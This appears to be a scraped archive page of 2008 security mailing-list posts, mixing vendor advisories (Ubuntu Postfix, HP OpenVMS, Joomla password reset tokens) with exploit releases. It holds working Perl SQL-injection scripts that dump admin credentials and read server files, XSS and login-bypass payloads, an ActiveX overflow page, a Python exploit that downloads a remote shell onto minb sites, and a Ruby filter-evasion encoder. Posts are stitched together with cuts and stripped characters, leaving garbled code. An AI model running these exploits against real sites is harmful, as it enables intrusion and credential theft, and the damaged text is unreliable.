[USN-642-1] Postfix vulnerabilities
=== Ubuntu Security Notice USN-642-1 September 10, 2008 postfix vulnerabilities CVE-2008-3889 === A security issue affects the following Ubuntu releases: Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.10: postfix 2.4.5-3ubuntu1.3 Ubuntu 8.04 LTS: postfix 2.5.1-2ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Wietse Venema discovered that Postfix leaked internal file descriptors when executing non-Postfix commands. A local attacker could exploit this to cause Postfix to run out of descriptors, leading to a denial of service. Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3.diff.gz Size/MD5: 208955 3596c996c2d82fcc9cd755c337cbac6b http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3.dsc Size/MD5: 1034 7097cb52b993eb39e3572516e37fa2fa http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5.orig.tar.gz Size/MD5: 2934634 ceba0cde05d12baa0ba2ed69fbb96b42 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-dev_2.4.5-3ubuntu1.3_all.deb Size/MD5: 131564 d817f30dac7e3cefa7207c9545484234 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-doc_2.4.5-3ubuntu1.3_all.deb Size/MD5: 805972 f21663666d6a5a9d4fc82842a22f72ab amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_amd64.deb Size/MD5:38160 2b8a37d554c58a28e23d10d86df219a9 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_amd64.deb Size/MD5:45310 900f1c0404391ecf79c1275175ef643d http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_amd64.deb Size/MD5:40108 a1a6ffbfb86958511d610025e0a73d58 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_amd64.deb Size/MD5:40160 a8775f56b0b51d99565ccbe731dc5e94 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_amd64.deb Size/MD5:40224 b989f80156a941d822b1e7d19477e08a http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_amd64.deb Size/MD5: 1188180 9850d0763881c36da658d051fd43bcc5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_i386.deb Size/MD5:37940 5cfcf1cf801d60e309428d6770e31e48 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_i386.deb Size/MD5:44644 0911f3527974816a8101e579ed439e7b http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_i386.deb Size/MD5:39790 10b6ae3688a3b74e208ba383973bd3a8 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_i386.deb Size/MD5:39634 df5c552d2f10bfcdff5e9e38b2ce946a http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_i386.deb Size/MD5:39876 938516395dfcadfb33c7becb673cc157 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_i386.deb Size/MD5: 1118910 8479b2542dd638e9bc78ee318ba320a2 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_lpia.deb Size/MD5:37918 c792b13b095b27f4c44f00b6ae7c5d4b http://ports.ubuntu.com/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_lpia.deb Size/MD5:44384 83e6e216238d4d3d6f4e1855767f3d40 http://ports.ubuntu.com/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_lpia.deb Size/MD5:39810 0a917ce72b8bc23490af6d2374ebfd84 http://ports.ubuntu.com/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_lpia.deb Size/MD5:39534 5c3c470f3609e053d212b96961bad854 http://ports.ubuntu.com/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_lpia.deb Size/MD5:39872 f8a381828c5e4e8056aad583282b2e70 http://ports.ubuntu.com/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_lpia.deb Size/MD5: 1109740 56a17d3a010a3e2ea1be39e9ffb9ae3a powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_powerpc.deb Size/MD5:40328 7574b4b3c594be170675c25b25cf7ddd
Ezphotogallery 2.1 Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
#!/usr/bin/perl
#
#
#Script : Ezphotogallery 2.1
#
#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File
Disclosure)
#
#Method : GET
#
#Alert : High
#
#Google Dork : 100% | 50% | 25% Back to gallery inurl:show.php?imageid=
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :
http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#
#Xss Vulnerabilities :
#
#Xss 1 : gallery.php?galleryid=scriptalert(document.cookie)/script
#Xss 2 :
show.php?imageid=156size=''?''scriptalert(document.cookie)/script
#Xss 3 : show.php?imageid=scriptalert(document.cookie)/script
#
#
#Login Bypass :
#
#Insert in gallery.php
#
#User : admin ' or ' 1=1
#Password : Dr.Crash
#
#
#Sql Injection :
#
#Injection 1 : show.php?imageid=sql
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
$scriptname=Ezphotogallery 2.1;
sub header
{
print
* $scriptname
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
sub usage
{
print
* Usage : perl $0 http://Example/
;
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul =
/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
print \n Username: .$name.\n\n;
print Password: .$password.\n\n;
}
#XPL2
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
$vul =
/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print File Save In source.txt\n;
print ;
}
#XPL2 END
#Starting;
print
* $scriptname
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
* Mod Options :*
* Mod 1 :
sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
# est.2007\/\/ forum.darkc0de.com #
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al#
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE#
# and all darkc0de members---#
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : [EMAIL PROTECTED]
#
# Share the c0de!
#
#
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
#
# Successfull exploitation crashes the Browser
#
# Tested On : WinXp Sp-2 IE 6.0
#
#
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll
# Class SQLVDirControl
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038}
# Number of Interfaces: 1
# Default Interface: ISQLVDirControl
# RegKey Safe for Script: False
# RegkeySafe for Init: False
# KillBitSet: False
#
html
Test Exploit page
object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target'
/object
script language='vbscript'
targetFile = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll
prototype = Sub Connect ( [ ByVal szServer As Variant ] , [ ByVal szWebSite
As Variant ] )
memberName = Connect
progid = SQLVDIRLib.SQLVDirControl
argCount = 2
arg1=defaultV
arg2=http://[EMAIL PROTECTED]
st\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL PROTECTED]
\test\tes\test\test\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL
PROTECTED]
t\te.s\ttest\test\test\tes\test\test\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL
PROTECTED]
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\
target.Connect arg1 ,arg2
/script
PhsBlog v0.2 Bypass Sql injection Filtering Exploit
#!/usr/bin/perl
#
#
#Script : PhsBlog v0.2
#
#Type : Bypass Sql injection Filtering Exploit
#
#Method : GET
#
#Risk : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
$scriptname=PhsBlog v0.2;
sub header
{
print
* $scriptname
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
sub usage
{
print
* Usage : perl $0 http://Example/
;
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul =
/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
print \n Username: .$name.\n\n;
print Password: .$password.\n\n;
}
#XPL2
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*
$vul =
?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print File Save In source.txt\n;
print ;
}
#XPL2 END
#Starting;
print
* $scriptname
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
* Mod Options :*
* Mod 1 : Find Script username and password*
* Mod 2 : File Disclosure(not work in many servers)*
;
print \n \n Enter Mod : ;
$mod=stdin;
if ($mod==1 or $mod==2) { print \n Exploiting .. \n; } else {
print \n Unknown Mod ! \n Exploit Failed !; };
if ($mod==1) { xpl1(); };
if ($mod==2) { xpl2(); };
minb Remote Code Execution Exploit
#!/usr/bin/python
#
minb Remote Code Execution Exploit
#
#
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Our Site : Http://IRCRASH.COM
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#
#
#
#
#Site : http://minb.sf.net
#
#
#
#Download :
http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2#
#
#
#DORK : Powered by minb
#
#
#
#
# [Note]
#
#
#
#All php file in this cms have this bug ;)
#
#
#
#
# Site : Http://IRCRASH.COM
#
## TNX GOD
##
import sys,urllib
if len(sys.argv)3 :
print minb Remote code Execution Exploit
print Powered by : R3d.W0rm
print www.IrCrash.com
print Usage : + sys.argv[0] + http://Target/path http://evil/shell.txt;
print Ex. + sys.argv[0] + http://site.com/minb http://r3d.a20.ir/r.txt;
exit()
if 'http://' not in sys.argv[1] :
sys.argv[1]='http://' + sys.argv[1]
if 'http://' not in sys.argv[2] :
sys.argv[2]='http://' + sys.argv[2]
fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'
data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=;$s=fopen(\'' +
sys.argv[2] +
'\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})
urllib.urlopen(sys.argv[1] + fp,data)
urllib.urlopen(sys.argv[1] + fp)
test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()
if 'Not Found' not in test :
print Shell Uploaded .
print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'
exit()
[security bulletin] HPSBOV02364 SSRT080078 rev.1 - HP OpenVMS SMGRTL Run Time Library, Local Authorized User, Gain Privileged Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01539423 Version: 1 HPSBOV02364 SSRT080078 rev.1 - HP OpenVMS SMGRTL Run Time Library, Local Authorized User, Gain Privileged Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-09-10 Last Updated: 2008-09-10 Potential Security Impact: Local authorized user, gain privileged access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP OpenVMS SMGRTL Run Time Library. The vulnerability could be exploited locally by an authorized user to gain extended privileges. References: CVE-2008-3540 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The SMGRTL Run Time Library provided with the following HP OpenVMS versions: HP OpenVMS for Integrity Servers v 8.3-1H1 HP OpenVMS for Integrity Servers v 8.3 HP OpenVMS for Integrity Servers v 8.2-1 HP OpenVMS ALPHA v 8.3 HP OpenVMS ALPHA v 8.2 HP OpenVMS ALPHA v 7.3-2 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-3540 (AV:L/AC:L/Au:S/C:P/I:P/A:P) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. The Hewlett-Packard Company thanks [EMAIL PROTECTED] for reporting this vulnerability to [EMAIL PROTECTED] RESOLUTION HP is providing the following early release patches publicly for use by any customer until updates are available in mainstream release patch kits. HP OpenVMS for Integrity Servers v 8.3-1H1 ECO VMS831H1I_MUP-SMGRTL-V0100 ECO Kit: ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3-1H1/VMS831H1I_SMGRTL_MUP-V0100.ZIPEXE ECO Notes: ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3-1H1/VMS831H1I_SMGRTL_MUP-V0100.txt HP OpenVMS for Integrity Servers v 8.3 ECO VMS83I_SMGRTL_MUP-V0100 ECO Kit: ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.ZIPEXE ECO Notes: ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.txt HP OpenVMS for Integrity Servers v 8.2-1 ECO VMS821I_SMGRTL_MUP-V0100 ECO Kit: ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.2-1/VMS821I_SMGRTL_MUP-V0100.ZIPEXE ECO Notes: ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.2-1/VMS821I_SMGRTL_MUP-V0100.txt HP OpenVMS for Integrity Servers v 8.3 ECO VMS83I_SMGRTL_MUP-V0100 ECO Kit: ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.ZIPEXE ECO Notes: ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.txt HP OpenVMS ALPHA v 8.3 ECO VMS83A_SMGRTL_MUP-V0100 ECO Kit: ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.3/VMS83A_SMGRTL_MUP-V0100.ZIPEXE ECO Notes: ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.3/VMS83A_SMGRTL_MUP-V0100.txt HP OpenVMS ALPHA v 8.2 ECO VMS82A_SMGRTL_MUP-V0100 ECO Kit: ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.2/VMS82A_SMGRTL_MUP-V0100.ZIPEXE ECO Notes: ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.2/VMS82A_SMGRTL_MUP-V0100.txt HP OpenVMS ALPHA v 7.3-2 ECO VMS732_SMGRTL_MUP-V0100 ECO Kit: ftp://ftp.itrc.hp.com/openvms_patches/alpha/V7.3-2/VMS732_SMGRTL_MUP-V0100.ZIPEXE ECO Notes: ftp://ftp.itrc.hp.com/openvms_patches/alpha/V7.3-2/VMS732_SMGRTL_MUP-V0100.txt PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) - 10 September 2008 Initial release Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is
Nooms 1.1
Script : Nooms 1.1
Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute
Force Local Access)
Risk : Medium
Download From :
http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
Mysql Remote Brute Force Vulnerability :
This is new type of the vulnerabilities .
I can't public Exploit of this vulnerability ,
But with this vulnerability attacker can brute force root and other user
password with php in remote mode .
Mysql Brute Force Vulnerability :
/db.php?g_dbhost=localhostg_dbuser=[username]g_dbpwd=[password]
Cross Site Scripting Vulnerabilities :
Xss 1 : http://Example/smileys.php?page_id=scriptalert('xss')/script
Xss 2 : http://Example/search.php?q=;scriptalert('xss')/script
Redirect Vulnerability :
Xss 1 : http://Example/admin/auth.php?g_site_url=[URL]
Tnx : God
HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Advisory 04/2008: Joomla Weak Random Password Reset Token Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: Joomla Weak Random Password Reset Token Vulnerability Release Date: 2008/09/11 Last Modified: 2008/09/11 Author: Stefan Esser [stefan.esser[at]sektioneins.de] Application: Joomla = 1.5.7 Severity: Usage of mt_rand() and mt_srand() for generation of cryptographic secrets like random password reset tokens Risk: High Vendor Status: Vendor has released a partially fixed Joomla 1.5.7 Reference: http://www.sektioneins.de/advisories/SE-2008-04.txt http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ Overview: Quote from http://www.joomla.org Joomla is an award-winning content management system (CMS), which enables you to build Web sites and powerful online applications. Many aspects, including its ease-of-use and extensibility, have made Joomla the most popular Web site software available. During an analysis of the password reset vulnerability fixed in Joomla 1.5.6 we realized that Joomla does not only generate random password reset tokens with mt_rand(), which is not secure enough for cryptographic secrets anyway, but additionally initializes the PRNG with a weak seed that results in less than 1.000.000 possible password reset tokens. Because there are only 1.000.000 possible password reset tokens an attacker can trigger a reset of the admin password and then try out all possible password reset tokens until he finds the correct one. Even with a home DSL line (as used in germany) breaking into the admin account should be possible in less than 3 hours. However attackers are usually bouncing over much faster hosts. In response to our report Joomla 1.5.7 was released (without sharing the patch with us prior the release) which replaces the very weak PRNG seeding with a new seed that is about 2^32 in strength. While this stops the simple brute forcing attack Joomla's password reset token is still vulnerable to mt_rand() leak attacks and because Joomla still seeds the PRNG with mt_srand() it is a potential threat to other PHP applications or plugins using mt_rand() on the same server. Details: The problems arising from using mt_(s)rand for cryptographic secrets and possible attacks against PHP's PRNG and PHP applications using it are explained by the blog post mt_(s)rand and not so random numbers which is available here: http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ Proof of Concept: SektionEins GmbH is not going to release a proof of concept exploit for this vulnerability. Disclosure Timeline: 15. Aug 2008 - Sent notification to Joomla about the vulnerability 20. Aug 2008 - Resent notification because no reply from Joomla 20. Aug 2008 - Received confirmation 21. Aug 2008 - Received a forwarded message from vendor-sec discussing the vulnerability - obviously Joomla shared our report with vendor-sec without asking or notifying us. 21. Aug 2008 - In a reply to the forwarded message we recommended NOT TO USE mt_srand for the password reset 03. Sep 2008 - On Joomla.org appears a blog post notifying their users that they should upgrade to Joomla 1.5.6 immediately because of security issues with the password reset 09. Sep 2008 - The Joomla Development Team releases Joomla 1.5.7 without telling us about this or consulting us to review their patch 11. Sep 2008 - Public Disclosure after learning about the new Joomla 1.5.7 in the media Recommendation: It is recommended to upgrade not only to the latest version of Joomla which also fixes additional vulnerabilities reported by third parties, but also to install the Suhosin PHP extension, which comes with a generic protection against mt_(s)rnad vulnerabilities. Upgrading only Joomla does not fix the whole problem. Grab your copies at: http://www.joomla.org http://www.suhosin.org CVE Information: The Common Vulnerabilities and Exposures project (cve.mitre.org) has not assigned a name to this vulnerability yet. GPG-Key: pub 1024D/15ABDA78 2004-10-17 Stefan Esser [EMAIL PROTECTED] Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C 57DD 4AE1 795E 15AB DA78 Copyright 2008 SektionEins GmbH. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (Darwin) iEYEARECAAYFAkjJLHkACgkQSuF5XhWr2njUYQCgq+5P1O+7llh32KXcCHqdQ/C4 QWoAoJGF6jt3rDyNM3ESDlfUA/NxW3f9 =AA3y -END PGP SIGNATURE-
RE: SQL Smuggling
Hi,
First let me start by saying im not writing to flame anyone (or whatever you
kids say these days). I know its can be a daunting to release a paper to the
security community because if any of its incorrect you're gonna hear about it.
However releasing a paper and claiming it to be a new class (or sub-class) of
vulnerability, well im sorry, its like wearing Gold football boots, you better
get it right after a statement like that.
If this paper was titled Bypassing Broken Input Validation Filters then there
would be no problems. However none of what exists in this document is new, in
fact most of it is in the Web Application Hackers Handbook or in much older
papers. Constructing attackers of all kinds to bypass black list filters is a
common duty of the web application tester, also take a look at all of the
recent SQL injection worms.
The main thing wrong here is claiming it to be something new, or even claiming
it to be a sub-class, it not!
Its several methods for encoding sql queries or tricking multi layered input
validation/sanitisation routines, none of which are new, all of which are
implemented by every pen/app tester i have ever worked with.
It could be a useful reference but i would rename it and drop the new class
claims.
Regards
Gary
P.S. You mention the unicode trick but dont provide any code or exploit
examples. Here is a ruby script to perform the encoding when attacking a bug
via IIS (others may also work).
# Ruby Script to generate URL encoded Unicode UTF-8 URL.
# Author: Gary O'leary-Steele of Sec-1 Ltd
# Example:
# The string ' or 1 in (@@version)-- is encoded as and work for the same SQL
injection attack
#
%u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d
#
#
require 'uri'
def unicode_url(string)
lookuptable = Hash.new
lookuptable ={
' ' = '%u0020',
'/' = '%u2215',
'\\' = '%u2215',
' = '%u02b9',
'' = '%u0022',
'' = '%u003e',
'' = '%u003c',
'#' = '%uff03',
'!' = '%uff01',
'$' = '%uff04',
'*' = '%uff0a',
'@' = '%u0040',
'.' = '%uff0e',
'_' = '%uff3f',
'(' = '%uff08',
')' = '%uff09',
',' = '%uff0c',
'%' = '%u0025',
'-' = '%uff0d',
';' = '%uff1b',
':' = '%uff1a',
'|' = '%uff5c',
'' = '%uff06',
'+' = '%uff0b',
'=' = '%uff1d',
'a' = '%uff41',
'A' = '%uff21',
'b' = '%uff42',
'B' = '%uff22',
'c' = '%uff43',
'C' = '%uff23',
'd' = '%uff44',
'D' = '%uff24',
'e' = '%uff45',
'E' = '%uff25',
'f' = '%uff46',
'F' = '%uff26',
'g' = '%uff47',
'G' = '%uff27',
'h' = '%uff48',
'H' = '%uff28',
'i' = '%uff49',
'I' = '%uff29',
'j' = '%uff4a',
'J' = '%uff2a',
'k' = '%uff4b',
'K' = '%uff2b',
'l' = '%uff4c',
'L' = '%uff2c',
'm' = '%uff4d',
'M' = '%uff2d',
'n' = '%uff4e',
'N' = '%uff2e',
'o' = '%uff4f',
'O' = '%uff2f',
'p' = '%uff50',
'P' = '%uff30',
'q' = '%uff51',
'Q' = '%uff31',
'r' = '%uff52',
'R' = '%uff32',
's' = '%uff53',
'S' = '%uff33',
't' = '%uff54',
'T' = '%uff34',
'u' = '%uff55',
'U' = '%uff35',
'v' = '%uff56',
'V' = '%uff36',
'w' = '%uff57',
'W' = '%uff37',
'x' = '%uff58',
'X' = '%uff38',
'y' = '%uff59',
'Y' = '%uff39',
'z' = '%uff5a',
'Z' = '%uff3a',
'0' = '%uff10',
'1' = '%uff11',
'2' = '%uff12',
'3' = '%uff13',
'4' = '%uff14',
'5' = '%uff15',
'6' = '%uff16',
'7' = '%uff17',
'8' = '%uff18',
'9' = '%uff19'}
# Convert string to array of chars
chararray = string.scan(/./)
newstr = String.new
chararray.each do |c|
if lookuptable.has_key? c
newstr = newstr + lookuptable[c]
else
newstr = newstr + URI.escape(c)
end
end
return newstr
end
print Enter string to URL Unicode:
